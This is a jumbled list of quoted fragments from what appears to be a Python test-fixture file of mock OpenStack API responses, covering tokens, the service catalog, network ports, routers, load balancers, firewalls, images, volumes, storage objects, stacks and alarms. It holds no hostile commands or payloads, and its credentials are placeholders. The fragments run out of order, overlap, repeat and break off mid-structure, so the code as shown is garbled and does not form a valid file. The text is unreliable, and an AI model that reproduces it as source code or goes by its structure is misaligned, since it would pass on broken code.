"\"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = {",
"\"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID,",
"\"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ {",
"'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\",",
"\"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] }",
"\"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\"",
"], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [",
"{ \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1],",
"\"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1]",
"VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT",
"\"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]],",
"[\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"]",
"'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, {",
"\"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\",",
"True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False,",
"True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2,",
"\"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\":",
"[{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status':",
"'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering'",
"{ \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1",
"# Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog':",
"\"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\",",
"] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\": [ {",
"# Unless required by applicable law or agreed to in writing, software #",
"\"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\":",
"PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\",",
"by applicable law or agreed to in writing, software # distributed under the",
"= \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT =",
"PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\":",
"\"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ {",
"\"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\":",
"} FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\",",
"], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\":",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL':",
"'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL':",
"\"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ {",
"\"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [",
"\"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\":",
"}, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\":",
"] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'],",
"None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = {",
"\"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\":",
"SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\",",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); you may",
"\"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"\"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"\"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" }",
"PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] },",
"\"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\":",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\",",
"[\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS",
"\"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None,",
"\"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\": [ {",
"\"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\":",
"u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b',",
"\"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\":",
"distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT #",
"test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\":",
"\"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\":",
"'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } }",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"} ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\":",
"None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True,",
"\"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\",",
"# not use this file except in compliance with the License. You may",
"] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\":",
"TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } },",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\",",
"\"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\":",
"PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\",",
"= 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT =",
"\"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False },",
"\"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None,",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{",
"\"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\",",
"] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule",
"\"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\",",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\":",
"Version 2.0 (the \"License\"); you may # not use this file except in",
"\"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None,",
"None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80,",
"\"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\",",
"\"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\":",
"{ \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ]",
"'2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject'",
"\"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\":",
"\"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\",",
"\"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\":",
"NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT",
"= 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT =",
"\"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE",
"LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\",",
"\"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\":",
"[], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [],",
"{ \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\",",
"5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0]",
"PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\",",
"PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\": \"tcp\",",
"{ \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\",",
"{ \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\":",
"'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username':",
"[ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False,",
"[\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS",
"} } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container':",
"False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\":",
"\"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [],",
"# -*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt # #",
"u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name':",
"\"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\":",
"\"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] }",
"{u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0,",
"\"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, { \"protocol\":",
"OF ANY KIND, either express or implied. See the # License for the",
"'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"\"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\":",
"\"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [",
"} LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\",",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{",
"\"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False",
"\"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ {",
"\"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\":",
"{ 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links':",
"1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False,",
"[ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\",",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{",
"= \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\",",
"u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\",",
"\"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": {",
"% VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id':",
"{ \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\",",
"utf-8 -*- # # Copyright © 2014 Cloudwatt # # Licensed under the",
"\"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\":",
"None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\",",
"'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token':",
"ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\":",
"u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22,",
"VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\"",
"\"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\":",
"'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL':",
"True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ {",
"}, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"# under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58'",
"\"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST =",
"\"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\":",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires':",
"FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [",
"[\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\",",
"SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\":",
"PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\",",
"{ \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\",",
